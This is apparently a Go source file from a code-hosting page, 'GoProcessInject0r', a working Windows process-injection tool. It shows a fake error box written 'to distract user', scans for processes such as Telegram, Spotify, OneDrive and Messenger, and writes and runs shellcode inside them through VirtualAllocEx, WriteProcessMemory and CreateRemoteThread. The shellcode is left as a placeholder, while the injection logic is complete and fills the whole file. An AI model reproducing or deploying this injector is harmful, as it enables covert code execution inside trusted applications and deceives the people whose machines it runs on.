GoProcessInject0r/multi.go

134 lines
4.0 KiB
Go
Raw Normal View History

2020-02-03 22:25:36 +00:00
// coded by s1ege greetz to all GSH members..
2020-02-03 21:45:10 +00:00
package main
import (
"syscall"
"unsafe"
"github.com/TheTitanrain/w32"
"time"
)
var proc_list = map[interface{}]interface{} {
// enter target processes here, the more the better..
"OneDrive.exe": 0,
"Telegram.exe": 0,
"Spotify.exe": 0,
"Messenger.exe": 0,
}
var targeted_pids []uint32
func messagebox() {
user32 := syscall.MustLoadDLL("user32.dll")
mbox := user32.MustFindProc("MessageBoxW")
title := "Error:"
message := "Error to distract user."
mbox.Call(0,
uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(message))),
uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(title))),
0)
}
func getprocname(id uint32) string {
snapshot := w32.CreateToolhelp32Snapshot(w32.TH32CS_SNAPMODULE, id)
var me w32.MODULEENTRY32
me.Size = uint32(unsafe.Sizeof(me))
if w32.Module32First(snapshot, &me) {
return w32.UTF16PtrToString(&me.SzModule[0])
}
return ""
}
func check_pid(pid uint32) bool {
// check if pid evaluates to true or if pid is in targeted_pids slice-
// return false else return true
for _,val := range targeted_pids {
if pid == 0 || pid == val {
return false
}
}
return true
}
func get_pids() {
size := uint32(1000)
procs := make([]uint32, size)
var bytesReturned uint32
for {
for proc,_ := range proc_list {
if w32.EnumProcesses(procs, size, &bytesReturned) {
for _, pid := range procs[:int(bytesReturned)/4] {
if getprocname(pid) == proc {
2020-02-06 23:33:17 +00:00
// if pid is valid set proc_list's corresponding key equal to pid
2020-02-03 21:45:10 +00:00
if check_pid(pid) {
proc_list[proc] = pid
}
} else {
// sleep 15 milliseconds to limit cpu usage
time.Sleep(15 * time.Millisecond)
}
}
}
}
}
}
func clear_pids() {
// decrease/increase time based on proc_list length
for {
time.Sleep(15 * time.Minute)
targeted_pids = targeted_pids[:0]
}
}
func inject(shellcode []byte, pid uint32) {
MEM_COMMIT := uintptr(0x1000)
PAGE_EXECUTE_READWRITE := uintptr(0x40)
PROCESS_ALL_ACCESS := uintptr(0x1F0FFF)
// obtain necessary winapi functions from kernel32 for process injection
kernel32 := syscall.MustLoadDLL("kernel32.dll")
openproc := kernel32.MustFindProc("OpenProcess")
vallocex := kernel32.MustFindProc("VirtualAllocEx")
writeprocmem := kernel32.MustFindProc("WriteProcessMemory")
createremthread := kernel32.MustFindProc("CreateRemoteThread")
closehandle := kernel32.MustFindProc("CloseHandle")
2020-02-06 23:34:38 +00:00
// inject & execute shellcode in target process' space
2020-02-03 21:45:10 +00:00
processHandle, _, _ := openproc.Call(PROCESS_ALL_ACCESS, 0, uintptr(pid))
remote_buf, _, _ := vallocex.Call(processHandle, 0, uintptr(len(shellcode)), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
writeprocmem.Call(processHandle, remote_buf, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0)
createremthread.Call(processHandle, 0, 0, remote_buf, 0, 0, 0)
closehandle.Call(processHandle)
}
func main() {
// enter shellcode here in 0x00 format
shellcode := []byte{0x00, 0x00, 0x00}
// thread to distract user with inauthentic error message
go messagebox()
// thread to scan for target pids
go get_pids()
// thread to clear targeted_pids slice to limit amount of memory used
go clear_pids()
// recursively iterate over proc_list's pids and filter out valid targets-
2020-02-03 21:58:15 +00:00
// sleeps are to limit cpu usage
2020-02-03 21:45:10 +00:00
for {
time.Sleep(1 * time.Second)
for _,val := range proc_list {
pid, _ := val.(uint32)
if check_pid(pid) {
inject(shellcode, pid)
targeted_pids = append(targeted_pids, pid)
} else {
time.Sleep(1 * time.Second)
}
}
}
}